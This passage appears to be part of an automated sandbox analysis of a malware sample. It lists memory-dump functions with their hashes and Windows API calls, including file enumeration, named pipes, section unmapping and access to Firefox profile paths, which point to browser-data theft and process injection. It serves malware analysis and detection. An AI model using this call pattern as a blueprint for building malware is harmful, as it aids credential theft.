  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6996, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110 Total matches: 35
Similarity
  • Total matches: 35
  • API ID: FlushFileBuffersGetLastErrormemset
  • String ID: K$P
  • API String ID: 1157411244-420285281
  • Opcode ID: b776852dc2126f9b1b4d2b6506190c96010406ec9a84ebb4623d6614876d6961
  • Instruction ID: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
  • Opcode Fuzzy Hash: 8CF07B5009DB0086D877E4020147FC67EA2B782DC5C94B7E134D1B2F5F2E10914AD758
  • Instruction Fuzzy Hash: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
APIs
  • memset.NTDLL ref: 001D6A41
  • FlushFileBuffers.KERNEL32(00000000), ref: 001D6AA8
